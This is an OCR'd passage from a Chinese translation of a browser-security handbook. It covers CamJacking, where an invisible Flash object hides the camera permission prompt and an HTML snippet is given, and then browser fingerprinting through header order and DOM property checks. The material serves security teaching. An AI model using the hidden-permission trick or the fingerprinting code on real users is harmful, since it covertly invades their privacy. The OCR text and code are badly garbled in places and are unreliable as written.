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Wh, 该 类 型 的 攻击 也 同样 依赖 社会 工程 学 组 件 , 尤其 是 需要 诱导 用 户 接 受 浏览 絮 弹 出 的 访问 摄像 
头 的 警告 ， 如 图 $-33 所 示 。 


门 browserhacker.com 


browserhacker.com 


BM http://browserhacker.com/ wants to use your camera. Learn more | Deny | | Allow | 








图 5-33 “Chrome 中 访问 摄像 头 的 警告 


目前 已 经 发 现 了 一 些 技 术 ， 可 以 诱导 用 户 在 无 意 中 允 许 特定 的 源 通 过 Flash 访 问 摄像 涉及 麦 
克 风 。 在 第 4 章 中 ， 我 们 讨论 过 RSnake 提 出 的 Flash 点 击 支持 概念 ，Igor Homakov 则 演示 了 类 似 
的 技术 ， 为 了 在 用 户 无 感知 的 前 提 下 ， 使 用 其 摄像 头 进 行 拍照 ”。 该 攻击 只 对 于 Chrome 27 以 前 
的 版 本 有 效 。 该 攻击 在 一 个 Flash 之 上 加 载 了 另 一 个 Flash， 且 对 后 者 设置 cpacity: 0， 如 下 面 
的 代码 所 示 : 

<object style="opacity:0.0;position:absolute; 

top:129px;left:100px;" width="270" height="270"> 

<param name="movie" value="cam.swf"> 


«embed src-"cam.swf" width="270" height="270"></embed> 
</object> 


通过 以 上 代码 ，cam.swf 通 过 对 象 标记 被 加 载 并 执行 。 尽 管 此 时 Flash 会 弹出 警告 框 ， 询 问 用 
户 是 否 人 允许 访问 摄像 头 ， 但 由 于 将 透明 度 设 为 了 0， 所 以 该 警告 并 不 可 见 。 图 5$-34 展 示 了 这 类 攻 
击 的 形式 〈 出 于 演示 目的 ， 我 们 调整 了 Flash 的 不 透明 度 ， 否 则 Flash 对 话 框 将 是 不 可 见 的 )。 











€ © | D 127.0.0.1/yellowbird/ 


Do you want to win a million dollars? 


Click "Yes!" to win. 








图 5-34 CamJacking 


对 使 用 了 比 Chrome 28 更 旧版 本 的 用 户 发 起 此 类 攻击 ,将 导致 获取 用 户 摄 像 尖 和 麦克 风 权 限 
的 方式 更 加 隐蔽 。 唯 一 的 要 求 就 是 诱导 用 户 点 击 页 面 中 的 某 处 ， 就 像 第 4 章 介 绍 的 点 击 动 持 攻 击 
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那样 。 

本 节 着 重 强调 了 作为 攻击 者 , 应 该 如 何 绕 过 一 些 隐 式 或 显 式 的 隐私 控制 。 此 外 还 讲 到 为 了 保 
护 摄像 头 的 安全 , 除了 将 其 挡住 的 笨 办 法 外 ,更 应 该 对 浏览 器 弹出 的 所 有 对 话 框 保持 警惕 。 [Ett 
憾 的 是 ,很 多 Web 用 户 习 惯 于 在 各 种 对 话 框 中 直接 点 击 OK 或 “下 一 步 *"， 可 能 他 们 已 经 对 各 式 各 
样 的 对 话 框 产生 了 疲劳 。 























5.5 小结 











作为 安全 评估 的 一 部 分 , 本 章 展 示 了 几 种 滥用 浏览 器 用 户 信任 和 隐私 的 攻击 技术 。 尽 管 其 中 
有 些 方法 仅 依赖 于 某 些 形式 的 小 把 戏 , 甚至 是 利用 界面 上 的 错觉 , 但 这 也 反映 出 用 户 是 多 么 容易 
对 他 们 遇 到 的 每 一 个 对 话 框 都 点 击 OK。 

我 们 也 验证 了 可 以 从 大 多 数 浏览 器 中 获取 多 少 有 价值 的 用 户 信息 , 例如 用 户 的 按键 、 鼠 标 移 
动 ， 甚 至 包括 与 硬件 〈 比如 摄像 头 ) 的 交互 。 随 着 浏览 器 技术 的 不 断 发 展 ， 尤 其 是 HTML5 的 发 
展 ， 这 些 攻 击 技术 也 在 逐步 进化 。 

本 章 最 后 介绍 了 控制 用 户 摄像 头 这 种 直接 影响 生活 隐私 的 事件 。 尽 管 这 种 攻击 当前 还 不 具备 
可 推广 性 , 但 是 它 的 发 展 空间 正在 持续 增 大 。 一 个 明显 的 例子 就 是 Google 最 近 发 布 了 它 的 智能 眼 
镜 产品 “。 相 信 在 不 远 的 未 来 ， 一 定 会 有 攻击 者 尝试 控制 目标 的 智能 眼镜 ， 并 暗中 利用 其 摄像 头 
和 麦克 风 帘 探 用 户 隐私 ， 如 何 防止 并 抵御 此 类 攻击 一 定 会 成 为 安全 工作 者 们 的 新 课题 。 







































































5.6 问题 


(1) JavaScript 有 一 个 方法 用 于 在 已 完成 泻 染 的 页 面 中 重 写 HTML 的 内 容 ， 请 描述 该 方法 。 

(2) 当 需 要 捕获 鼠标 点 击 时 ， 应 该 使 用 什么 事件 ? 

(3) 在 正中 如 何 进 行 UI 期 望 滥用 ， 请 举例 。 

(4) 怎样 才能 绕 过 下 的 SmartScreen 筛 选 髓 ? 

(5) 为 什么 软件 升级 提示 容易 被 模仿 ? 

(6) 你 可 以 在 哪些 浏览 器 中 进行 标签 劫持 攻击 ? 

(7) 简 述 使 用 Java 小 程序 的 优点 及 限制 。 你 建议 使 用 经 过 签名 的 版 本 还 是 未 经 签名 的 版 本 ? 

(8) 可 以 访问 哪些 资源 以 便 检 查 当 前 浏览 器 是 否 使 用 了 Tor? 

(9) 使 用 浏览 器 进行 录音 的 前 提 条 件 有 哪些 ? 

(10) 请 简 述 CamJacking 攻 击 。 

要 查看 问题 的 答案 ， 请 访问 本 书 网 站 https://browserhacker.com/answers ， 或 者 Wiley 的 网 站 
http://www.wiley.com/go/browserhackershandbook。 
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浏览 器 如 今 作为 一 个 门户 ,每 天 都 有 数 不 清 的 人 在 使 用 。 通 过 它 联 系 朋 友 , 通过 它 为 在 线 游 
戏 中 的 庄稼 浇 水 , 通过 它 上 网 购物 , 通过 它 管理 自己 的 银行 账号 , 通过 它 娱 乐 , 通过 它 获取 信息 。 
浏览 器 已 经 远 远 不 再 是 一 个 查看 网 页 的 工具 了 ， 它 已 经 成 为 帮助 我 们 运行 其 他 应 用 的 应 用 。 

过 去 ， 浏 览 器 成 为 主要 的 攻击 目标 是 因为 它 想 支持 的 众多 功能 。 从 安全 角度 看 ， 浏 览 器 走 
过 了 一 段 非 常 长 的 路 。 如 今 的 浏览 器 都 把 安全 作为 一 个 重要 特性 ， 比 如 图 6-1 所 示 的 Firefox。 
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图 6-1 Firefox: Bu, xi. BE 


但 这 并 不 意味 着 攻击 者 会 放 过 浏览 器 。 事 实 刚好 相反 。 攻 击 者 ( 以 及 安全 研究 者 ) 投入 了 大 
量 的 时 间 和 精力 攻击 Web 浏 览 器 。 甚 至 都 有 专门 的 公开 比赛 ,用 丰厚 的 奖金 鼓励 人 们 去 发 现 新 颖 
的 方式 以 攻击 最 新 版 本 的 浏览 器 *。 有 些 浏览 器 厂商 还 会 设立 bug 奖 金 或 现金 大 奖 ， 颁发 给 那些 发 
现 浏览 器 漏洞 的 人 >。 

浏览 器 从 桌面 到 移动 端的 延伸 ,， 令 其 更 加 成 为 众矢之的 。 我 们 生 在 一 个 万 物 互联 的 时 代 , 漫 
步 街 头 ， 总 能 看 到 人 们 拿 着 手机 ， 聊 着 Twitter， 拍 着 Instagram， 通 过 分 享 、 发 帖 、 评 论 、 留 言 3 
表达 心情 或 讨论 问题 ， 甚 至 只 是 消磨 时 光 ， 在 无 边 无 限 的 互联 网 之 海中 畅游 。 

随 着 人 们 口袋 里 的 设备 能 够 访问 的 站 点 和 服务 越 来 越 多 ， 他 们 对 设备 的 信任 感 也 与 日 俱 增 。 
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在 线 银行 和 在 线 购 物 是 完全 互联 网 化 的 两 个 主要 领域 。 令 人 惊奇 的 是 ,移动 在 线 商 务 ， 特 别 是 手 
机 银行 ,居然 最 早出 现在 非洲 的 发 展 中 国家 。2011 年 ;5， 手 机 银行 系统 在 非洲 、 亚 太 地 区 和 拉丁 
美洲 爆发 ， 其 中 非洲 份额 居然 占 到 当时 系统 总 量 的 30%。 
本 章 将 探讨 如 何 直接 攻击 浏览 器 , 也 就 是 利用 浏览 器 自身 的 漏洞 , 不 管 它 安装 了 什么 扩展 或 
插件 。 有 具体 来 说 ， 我 们 会 探讨 采集 浏览 器 指纹 、 攻 击 会 话 和 cookie、HTTPS 攻 击 ， 以 及 其 他 利用 
浏览 器 漏洞 的 高 级 技术 。 


6.1 采集 浏览 器 指纹 


在 实际 攻击 浏览 右 之 前 , 首先 必须 确切 知晓 目标 使 用 的 浏览 器 类 型 及 版 本 。 确 定 这 些 信息 
过 程 叫 作 采 集 指 纹 (fingerprinting )。 就 像 每 个 人 都 有 自己 的 指纹 一 样 , 浏览 器 也 有 自 pea 
"e, E as 版 本 和 平台 。 如 果 攻 击 涉及 操作 系统 或 特定 设备 ,那么 了 解 浏览 

器 的 平台 信息 就 尤其 重要 。 

采集 指纹 可 以 用 来 描述 两 种 不 同 的 活动 。 第 一 种 是 识别 浏览 器 的 平台 和 版 本 , 第 二 种 则 主要 
用 于 唯一 地 标识 不 同 的 浏览 器 。 识 别 独特 的 浏览 器 通常 用 于 跟踪 个 别 的 浏览 器 ,而 不 仅仅 是 识别 
平台 。 在 此 过 程 中 ,还 会 遇 到 很 多 别 的 信息 。 不 过 ， 对 本 章 而 言 ， 我 们 所 说 的 采集 指纹 ， 就 是 指 
确定 浏览 器 的 平台 和 版 本 。 关 于 跟踪 个 别 用 户 的 更 多 信息 ， 参 见 5.4 节 的 内 容 。 

那么 如 何 逐 渐 缩 小 范围 以 确定 目标 使 用 的 浏览 器 版 本 呢 ? 要 回答 这 个 问题 ， 本 节 会 查看 
HTTP 请 求 首部 、DOM 属 性 ， 以 及 分 析 浏 览 器 的 独 有 特征 。 

HTTP 请 求 首部 是 随同 每 一 个 Web 请 求 发 送 的 信息 ， 详 细 描 述 了 浏览 器 支持 的 特性 、 请 求 的 
URL, 以 及 主机 名 和 其 他 信息 。 在 后 面 一 个 小 节 我 们 会 看 到 ,通过 查看 首部 可 以 分 辨 出 不 同 浏览 
器 的 差别 。 

通过 查看 DOM， 可 以 看 到 浏览 絮 保 存 的 正在 浏览 的 页 面 信 息 。 由 于 不 同 浏览 器 支持 不 同 的 
特性 ， 特 别 是 支持 暴露 给 DOM 的 不 同 特性 ， 因 此 查看 DOM 有 助 于 了 解 浏览 器 特别 支持 的 特性 。 
通过 和 已 知 的 浏览 器 特性 进行 比较 ， 可 以 进一步 缩小 浏览 器 类 型 与 版 本 号 的 范围 。 再 加 上 关于 
DOM 的 各 种 信息 ， 可 以 掌握 不 同 平台 和 版 本 的 浏览 占 下 DOM 的 不 同 特征 ， 最 后 把 这 些 信 息 组 合 
起 来 就 可 以 得 到 匹配 特征 (match )。 

此 外 ， 也 可 以 根据 浏览 器 的 bug 来 识别 浏览 器 。 与 大 多 数 应 用 一 样 ， 浏 览 咒 同样 存在 pu 
不 一 致 的 行为 ， 也 存在 bug。 通 过 检测 这 些 信息 ， 可 以 得 知 当前 浏览 器 是 位 于 某 个 补丁 之 前 还 
之 后 。 

在 搜集 多 方面 信息 的 基础 上 , 可 以 确定 当前 浏览 器 的 版 本 号 是 23 还 是 25, 最 后 确定 一 个 具体 
的 版 本 。 这 个 过 程 就 是 不 断 优化 缩小 目标 的 过 程 ， 有 了 确切 的 目标 才能 更 好 地 组 织 攻 击 。 

组 合 浏览 器 的 UA( User-Agent， 用 户 代 理 ) 首部 和 DOM 属 性 的 信息 ， 可 以 辅助 验证 浏览 器 
指纹 采集 的 结果 。 由 于 UA 首部 存在 被 算 改 的 可 能 ， 所 以 有 时 候 未 必 可 以 全 信 。 如 果 你 色 连 的 浏 
览 絮 的 UA 首部 中 包含 “Firefox”， 却 存在 window.opera 这 个 DOM 属性 ， 那 这 个 浏览 器 事实 就 并 
非 Firefox。 通 过 这 样 分 析 , 可 以 大 概 确定 它 就 是 Opera， 只 不 过 UA 首 部 被 造假 了 。DOM 属 性 同样 





























































































































































































































6.1 采集 浏览 器 指 197 








也 可 以 伪造 ， 但 不 像 修 改 UA 首 部 那么 简单 ， 也 不 太 常 见 。 除 了 DOM 属 性 和 UA 首部 ， 如 果 能 再 
加 上 对 浏览 器 bug 的 检测 ， 基 本 上 就 能 确定 要 攻击 的 浏览 器 的 类 型 了 。 


6.1.1 使 用 HTTP 首部 


每 一 个 HTTP 请 求 和 响应 中 都 包含 HTTP 首 部 , 正如 1.3.1 节 所 介绍 的 。 这些 首部 用 于 帮助 浏览 
器 与 服务 器 之 间 就 如 何 传 输 信息 达成 一 致 ， 同 时 共享 网 页 本 身 内 容 之 外 的 有 关 网 页 的 信息 和 数 
据 。 浏览 器 与 服务 器 之 间 讨 论 的 内 容 不 适合 多 悉 善 感 的 人 , 它们 通常 不 会 客 套 , 而 是 直 来 直 去 地 





























表达 。 下 面 我 们 通过 图 6-2 来 了 解 一 下 Web 请 求 的 构成 。 
(4) @ echo.opera.com —— " 








GET / HTTP/1.1 
Remote: 98.188.75.126 59114 


Host: echo.opera.com 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:21.0) Gecko/20100101 Firefox/21.0 
Accept: text/html application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US en;q-0.5 

Accept-Encoding: gzip, deflate 

Connection: keep-alive 

If-None-Match: "23efb65a38637d88494dff061a4cd40e;gzip" 








16-2 ”打开 echo.opera.com 时 的 浏览 器 首部 


在 浏览 器 中 打开 http://echo.opera.com， 就 可 以 看 到 浏览 器 在 请 求 中 发 送 给 服务 器 的 首部 信 
息 。 第 一 行 通常 叫 请 求 行 ， 包括 一 个 动词 、 一 个 位 置 和 一 个 协议 的 版 本 号 。 动 词 表示 浏览 器 想 干 
什么 , 包括 GET、POST 或 HEAD。 在 采集 浏览 器 指纹 的 情境 下 , 动词 、 位 置 和 版 本 号 不 如 其 他 信 
息 重要 。 从 图 6-2 可 以 看 到 ,Host 首 部 是 第 一 个 ,通过 它 可 以 看 到 正在 连接 的 主机 是 echo.opera.com。 
事实 上 ， 把 Host 首 部 放 在 第 一 位 非常 N 原因 稍 后 可 以 看 到 。 

出 于 采集 指纹 的 目的 ，UA 首 部 信息 最 为 丰富 ， 但 也 是 最 易 被 造假 的 。 从 图 6-2 也 可 以 清楚 地 
看 到 , 该 浏览 器 明确 表示 自己 是 Firefox 21, 运行 在 一 台 Intel 的 Mac 电 脑 中 。 这 个 浏览 器 使 用 Gecko 
布局 引擎 ， 该 引擎 是 Mozilla Firefox 使 用 的 。 引 擎 信息 也 是 对 浏览 器 可 能 是 Firefox 的 一 个 辅助 验 
ES 

其 他 首部 表示 通信 和 参数， 其 中 Accept 首 部 表示 浏览 器 将 接受 什么 类 型 的 信息 来 作为 响应 
Accept-Language 首 部 表示 期 望 的 语言 。Accept-Encoding 首 部 表示 为 节省 流量 最 合适 的 数据 压缩 方 
式 ， 而 Connection 首 部 表示 它 支 持 一 次 连接 多 次 请 求 。 这 些 首部 通常 都 以 特定 顺序 发 送 ， 不 过 由 
于 浏览 器 版 本 不 同 ， 它 们 的 顺序 也 可 能 发 生变 化 。 

看 一 下 图 6-3, 这 是 在 不 同 浏览 器 中 打开 同一 个 网 页 时 的 样子 , 对 比 图 6-2 可 以 看 到 不 同 之 处 。 
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Address | @) http: //echo.opera.com/ 


GET / HTTP/1.1 





Remote: 204.13.200.248 39865 


Accept: i: d 

Accept- adus 

Language: 

Accept- 

Encoding: gnp, deflate 

User-Agent: Monila/4.0 (compatible, MSIE 6.0, Windows NT 5.1, SV1, NET CLR 2.0.50727, NET CLR 3.0.4506.2152, NET CLR 3.5.30729, 
NET4.0C; .NET4.0E; MS-RTC LM 8) 

Host: echo, opera.com 


Connection: Keep-Alive 











16-3 iil Windows XP 上 的 IE6 查 看 echo.opera.com 的 结果 

















从 图 标 就 知道 这 是 来 自 Windows XP 机 器 上 的 正 。 进 一 步 探索 ， 还 会 发 现 其 他 一 些 信息 。 这 
些 信 息 不 仅 能 帮 你 识别 浏览 器 ， 还 能 识别 系统 中 安装 的 相关 软件 。 查 看 这 里 的 UA 首 部 ， 除 了 能 
从 中 看 出 这 是 Windows XP 中 的 IE6 之 外 ， 还 能 发 现 系 统 安装 了 很 多 基于 Web 的 增强 软件 。 

比如 说 ， 系 统 安装 了 .NET 框 架 的 第 2、3 、3.5 和 4 版 ， 而 且 还 安装 了 微软 实时 通信 (Microsoft 
Real-Time Communication ) 插件 。 如 果 该 浏览 器 并 没有 算 改 UA 字段 ， 由 此 就 可 以 知道 确切 的 软件 
版 本 。 如 果 这 些 信息 是 被 算 改 过 的 ， 那 么 从 首部 的 发 送 顺序 仍然 可 以 轻易 得 到 有 用 的 信息 。 

注意 一 下 每 个 首部 字段 的 顺序 , 可 以 发 现 Host 首 部 的 位 置 变 了 。 与 在 Firefox 中 位 于 开头 不 同 ， 
IE6 中 的 Host 首 部 在 接近 末尾 的 地 方 。 不 过 ，Accept、Accept-Language 和 Accept-Encoding 首 部 的 
顺序 仍然 相同 ,但 它们 这 次 出 现在 UA 之 前 ， 而 非 之 后 。 相 对 于 UA 字段 ， 这 些 首部 的 位 置 与 先后 
顺序 是 很 难 改 变 的 。 因 此 ， 看 到 这 些 信息 的 顺序 时 ， 基 本 上 可 以 断定 目标 浏览 器 就 是 I[E T o 

更 有 意思 的 是 ， 并 非 所 有 IE 版 本 发 送 这 些 首部 的 顺序 都 相同 。 下 面 看 一 看 图 6-4 中 Windows 7 
上 的 IE8。 
































@ http://echo.opera.com/ iC ied ~ CS de v Pager Safetyv Toolsy @ 
GET / HTTP/1.1 
Remote: 204.13.200.248 4345 


Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x- 
ms-xbap, */* 

Accept- 

Language: 

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; 
NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) 


en-us 


Accept- 


Encoding: 5"P:defate 


Host: echo.opera.com 
Connection: Keep-Alive 


























图 6-4 通过 Windows 7 上 的 IE8 查 看 echo.opera.com 的 结果 





从 中 也 可 以 发 现 类 似 的 地 方 ， 特 别 是 Accept 和 Accept-Language 首 部 的 位 置 ， 它 们 都 位 于 UA 
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首部 之 前 。Host 首 部 同样 还 在 倒数 第 二 位 。 可 是 ，Accept-Encoding 首 部 的 位 置 变 了 。 而 这 一 次 的 
UA 也 提供 了 不 同 的 信息 。 可 以 看 到 , 其 中 给 出 的 布局 引擎 变 成 了 Trident/4.0, 而 且 还 给 出 了 Media 
Center PC 和 SLCC2 等 较 新 的 特性 。 最 后 ， 相 对 于 IE6， 这 里 的 Accept 字 段 的 内 容 也 不 一 样 了 。 

假如 UA 字段 被 算 改 过 ， 那 么 理解 这 些 不 同 之 处 也 有 助 于 推断 出 当前 浏览 器 仍然 是 某 个 I 的 
变 体 。 而 且 通 过 Accept-Encoding 首 部 位 于 UA 首部 之 后 ， 也 可 以 知道 相应 的 正版 本 大 于 6。 关 联 起 
来 的 信息 越 多 ， 就 越 容易 精准 判断 浏览 器 的 版 本 。 

另外 , 你 应 该 已 经 发 现 , UA 字符 串 中 也 会 包含 底层 操作 系统 的 描述 符 , 比如 Windows NT 6.1。 
相对 于 确定 浏览 器 而 言 ,确定 桌面 操作 系统 要 容易 一 些 , 这 是 因为 操作 系统 的 组 合 数量 有 限 。 如 
果 是 移动 设备 ， 则 确定 操作 系统 的 难度 会 明显 增加 。 

Anthony Hand 的 MobileESPProject 致 力 于 为 识别 移动 设备 提供 轻 量 级 的 API。MobileESP 提 供 
了 多 种 语言 的 API， 包 括 ASPNET、Ruby、Python 和 PHP， 因 此 可 移植 性 非常 好 。 这 个 项 目 还 提 
供 了 开源 的 JavaScript 库 ， 可 用 于 检测 有 限 的 移动 客户 端 设备 。 这 个 mdetectjs 库 包含 了 大 约 75 种 
不 同 的 移动 设备 的 UA 字符 串 ， 然 后 提供 了 相应 的 JavaScript 检 测 API。 比 如 ， 以 下 代码 演示 了 如 
何 检 测 iPhone: 

var deviceIphone = "iphone"; 


var deviceIpod = "ipod"; 
var devicelIpad = "ipad"; 












































function DetectIphone() 
{ 
if (uagent.search(deviceIphone) > -1) 
{ 
if (DetectIpad() || DetectIpod() ) 
return false; 
else 
return true; 
j 
else 
return false; 


) 

除了 检测 iPhone， 这 个 库 还 提供 了 一 些 函 数 ， 可 以 检测 Symbian 设备 、Google TV、 摩 托 罗 拉 
Xoom 设 备 、 各 种 BlackBerry 设 备 、 Palm 的 WebOS、 游戏 主机 , 等 等 , 可 以 从 以 下 链接 了 解 mdetect.js 
的 最 新 版 本 : https://code.google.com/p/mobileesp/。 














6.1.2 使 用 DOM 属性 


为 了 更 准确 地 确定 目标 浏览 器 的 版 本 , 还 要 依赖 于 对 不 同 浏 览 器 版 本 之 间 特 性 和 其 他 信息 的 
比较 。DOM 就 是 使 用 最 多 的 信息 源 之 一 。 

DOM 中 不 仅 保 存 着 显示 在 屏幕 上 的 文档 的 信息 ， 还 保存 着 显示 器 分 辩 率 、 导 航 信息 等 帮助 
开发 者 更 容易 与 浏览 需 交 互 的 数据 。 新 特性 不 断 被 实现 ， 同 样 有 助 于 缩小 目标 浏览 需 的 范围 。 
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1. DOM 属 性 是 否 存在 





检测 某 个 DOM 属 性 存在 与 否 有 助 于 确定 浏览 器 的 确切 版 本 。 访问 http://webbrowsercompatibility. 








com/dom/desktop/， 可 以 看 到 DOM 属 性 的 差异 *。 这 个 网 站 提供 了 不 同 浏览 器 版 本 与 相应 DOM 特 





性 的 信息 ,让 开发 者 了 解 某 项 功能 是 否 得 到 了 全 部 浏览 器 的 支持 。 本 节 将 做 类 似 的 属性 检测 ,不 
过 目标 是 检测 其 中 某 些 特性 是 否 存在 。 通 过 比较 某 些 特性 存在 与 否 , 可 以 缩小 浏览 器 的 版 本 范围 。 
在 查询 DOM 属 性 时 ， 可 能 会 得 到 下 面 4 种 响应 结果 : 























口 undefined, 原因 是 属性 不 存在 ; 
O Nul1 或 NaN， 原 因 是 属性 未 设置 ; 





ny 

















口 属性 的 值 。 








O Unknown ， 原 因 是 属性 被 废弃 或 需要 ActiveX ( 仅 限 IE ); 





我 们 要 检测 返回 结果 是 上 述 哪 一 种 , 对 于 每 种 检测 的 答案 , 我 们 希望 看 到 true 或 false。 为 





此 , 可 以 使 用 类 似 !window .devicePixelRatio 这 样 的 表达 式 , 确定 
就 会 返回 false。 如 果 不 存在 ， 就 会 返回 Erue。 这 种 方式 与 直观 的 方式 相反 ,因此 要 确定 某 个 属 
性 是 否 存 在 ， 要 使 用 双重 否定 来 得 到 更 直观 的 答案 ， 比 如 ! window.devicePixelRatio。 在 
属性 存在 的 情况 下 , 这 个 双重 否定 表达 式 当然 会 返回 true, 而 在 不 存在 的 情况 下 , 则 返回 false。 
这 样 可 以 让 查询 更 容易 , 也 可 以 保证 每 次 都 能 返回 











下 怎么 在 实践 中 使 用 它 。 
在 Firefox 18.0 中 ，Moz 





illa 添 加 了 新 的 DOM 属 履 








EdevicePixelRatio’. 显然 ， 这 个 属性 与 显 





属性 是 否 存在 。 如 果 存 在 ， 








true 或 fal se 这 样 直 观 的 答案 o 下面 我 们 看 一 














"Hm 





示 Web 内 容 有 关 。 为 什么 要 关注 它 ?” 为 了 采集 浏览 顺 指 纹 ， 但 我 们 不 关心 它 具 体 的 功能 。 我 们 只 


关心 在 Firefox 17.0 中 ， 这 个 DOM 


图 6-5 所 示 。 








! Firefox 


Notes (First offered to release channel users on January 8, 2013) 


Check out "What's New" and "Known Issues" for this version of Firefox below. As 


always, you're encouraged to tell us what you think, or file a bug in Bugzilla. 
If interested, please see the complete list of changes in this release. 
What's New 
NEW j Faster JavaScript performance via lonMonkey 
compiler 


new d Support for Retina Display on OS X 10.7 and up 
new j Preliminary support for WebRTC 


© CHANGED d Performance improvements around tab switching 


%  oevelorer f Support for new DOM property 
window.devicePixelRatio 


图 6-5 Firefox 发 布 说 明 表 示 添 加 了 新 属 1 








al 
HE 





属性 并 不 存在 ， 而 在 下 一 个 主 版 本 即 Firefox 18.0 中 则 存在 ， 如 
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知道 了 这 个 信息 ， 就 可 以 利用 它 来 采集 浏览 器 指纹 了 。 从 Mozilla 的 发 布 服务 器 https://ftp. 
mozilla.org/pub/mozilla.org/firefox/releases/， 下 载 Firefox 17 和 Firefox 18， 并 在 电脑 中 安装 。 安 装 
之 后 , 为 它们 都 装 上 Firebug 扩 展 , 地 址 为 http://getfirebug.com/。Firebug 可 以 让 你 查看 和 查询 DOM 
元 素 。 

先 打开 Firebug， 然 后 打开 Console 选 项 卡 ， 选 中 Show Command Editort 选 项 ， 如 图 6-6 所 示 。 
然后 ,应 该 看 到 一 个 文本 块 出 现在 屏幕 右 下 方 ,而 且 有 4 个 不 同 的 按钮 :Run、Clear、Copy 和 History。 





| Console > | HTML CSS Script DOM Net Cookies 
= y Enabled | 


Y Show JavaScript Errors 
Show JavaScript Warnings 
Show CSS Errors 
Show XML/HTML Errors 

Y Show XMLHttpRequests 
Show Chrome Errors 
Show Chrome Messages 
Show External Errors 

v Show Network Errors 
Show Stack Trace With Errors 
Show Cookie Events 
Strict Warnings (performance penalty) 


v Show Command Editor 
Y Show Completion List Popup 





图 6-6 ”启用 Firebug 的 Command Editor 面 板 





在 两 个 Firebug 控 制 台 窗口 中 都 执行 1!!window.devicePixelRatio， 可 以 看 到 返回 了 相反 
的 布尔 值 。 在 Firefox 17 中 执行 ! !window.devicePixelRatio， 得 到 的 布尔 值 是 false， 如 图 


6-7 所 示 。 
>>> | lwindow. devicePixelRatio 
false 


图 6-7 ”检测 Firefox 17 中 是 否 存 在 aevicePixelRatio 属 性 

















在 Firefox 18 中 执行 !!window.devicePixelRatio， 会 看 到 布尔 值 为 Lrue 的 结果 返回 ， 如 


图 6-8 所 示 。 
>>> llwindow.devicePixelRatio 
true 


图 6-8 ”检测 Firefox 18 中 是 否 存 在 aevicePixelRatio 属 性 


在 这 里 , 关键 是 要 知道 它 并 非 针 对 Firefox 18 的 测试 。 这 个 测试 告诉 我 们 浏览 器 是 Firefox ( 也 
可 能 不 是 )， 而 版 本 等 于 或 大 于 18 ( 如 果 测 试 返回 true )。 另 外 ， 它 也 会 告诉 我 们 浏览 器 版 本 小 
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于 18 (如果 测试 返回 false )。 

实践 中 , 可 以 把 这 个 信息 封装 在 一 个 JavaScript 函 数 里 , 用 于 识别 特定 的 Firefox 版 本 。 查 看 一 
下 Firefox 的 发 布 说 明 *, 除了 Firefox 18 中 的 改变 之 外 , Firefox 21 又 添加 了 新 属性 window. crypto. 
getRandomValues。 有 了 这 两 个 属性 ， 又 可 以 进一步 缩小 浏览 器 版 本 的 范围 : 


function fingerprint FF()( 
result - "Unknown"; 
if(!!window.crypto.getRandomValues) { 
result = "21+"; 
selse{ 
if (! !window.devicePixelRatio) { 
result = "18+"; 
yelse{ 
result = "-17"; 








} 
} 
alert (result); 


} 

有 了 这 段 JavaScript， 可 以 检测 浏览 器 版 本 是 大 于 等 于 21, 还 是 大 于 18, 或 者 小 于 17。 虽然 要 
确定 更 具体 的 版 本 号 还 要 辅 以 其 他 信息 , 但 通过 这 样 组 合 一 系列 检测 , 已 经 可 以 将 浏览 咒 版 本 缩 
小 到 很 小 的 范围 内 ， 如 图 6-9 所 示 。 











(4) « @ file: ///tmp/FingerprintFF.htm! Wy 





图 6-9 警告 框 显 示 Firefox 的 版 本 大 于 21 


这 些 推 断 只 是 基于 既定 信息 的 一 种 估计 。 假 如 Web 浏 览 器 开发 者 决定 在 版 本 25 中 去 掉 
devicePixelRatio 属 性 , 或 者 在 版 本 17.9 中 添加 这 个 属性 ,那么 就 可 能 导致 我 们 的 检测 算法 失 
效 或 误 报 。 总 之 ， 这 些 都 只 是 估计 ， 不 能 作为 确定 性 的 结论 。 

记 住 , 就 如 同 可 以 对 UA 首 部 造假 一 样 ,对 DOM 属 性 同样 也 可 以 造假 。 假 设 http:/browservictim. 
com 是 你 控制 之 下 的 一 个 源 , 那么 在 文档 的 head 部 分 加 上 如 下 代码 之 后 ,就 可 能 导致 使 用 DOM 属 
性 来 采集 浏览 器 指纹 的 第 三 方 JavaScript 中 招 : 
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<script> 

// 通过 如 下 代码 ，! Iwindow.opera 检测 返回 true 
var opera = {isOpera: true} 

window.opera = opera; 

</script> 


在 取得 相应 的 DOM 属 性 后 ， 访 问 window.opera 将 返回 如 下 结 


>window.opera 
Object {isOpera: true} 


>! !window.opera 
true 


想 确 定 具 体 的 浏览 器 版 本 时 , 不 能 仅仅 依靠 一 个 浏览 器 特征 。 前 面 的 代码 很 好 地 说 明了 为 什 
么 应 该 组 合 多 种 采集 方法 ， 以 减少 不 精确 判断 的 可 能 性 。 

2. 使 用 DOM 属 性 值 

根据 DOM 属 性 存在 与 否 判 断 浏览 器 版 本 仅仅 是 识别 浏览 器 的 一 种 方法 。 要 想 更 全 面 地 了 解 
浏览 器 ， 还 应 该 进一步 取得 DOM 中 变量 的 值 。 

在 不 同 的 浏览 器 中 ， 某 些 DOM 属 性 值 由 于 继承 自 浏 览 嚣 本身， 并 不 容易 改变 。 这 一 点 很 重 
要 ， 因 为 请 求 首 部 的 User-Agent 字 符 串 很 容易 修改 。 比 如 ， 有 很 多 Firefox 扩 展 可 以 让 你 轻易 修改 
其 User-Agent 字 符 叮 ， 如 图 6-10 所 示 ， 其 中 展示 给 网 页 的 User-Agent 字 符 串 已 经 被 改 成 了 IE6。 只 
有 深入 了 解 DOM 变 量 ， 才 会 知道 原来 这 个 浏览 器 是 Firefox。 



































mh < > s Console ~ | HTML CSS Script DOM Net Cookies 


là Clear Persist Profile All Errors Warnings Info Debug info Cookies 





>>> window.navigator 

Navigator { appCodeName-"Mozilla", appName="Microsoft Internet Explorer", 
appVersion="4.8 (compatible; MSIE 6.8; Windows NT 5.1)", more... } 

>>> window.navigator .appName 

"Microsoft Internet Explorer” 

>>> window.navigator.userAgent 

"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 
Firefox/22.0" 


























图 6-10 ”通过 Firebug 控 制 台 获得 浏览 器 信息 


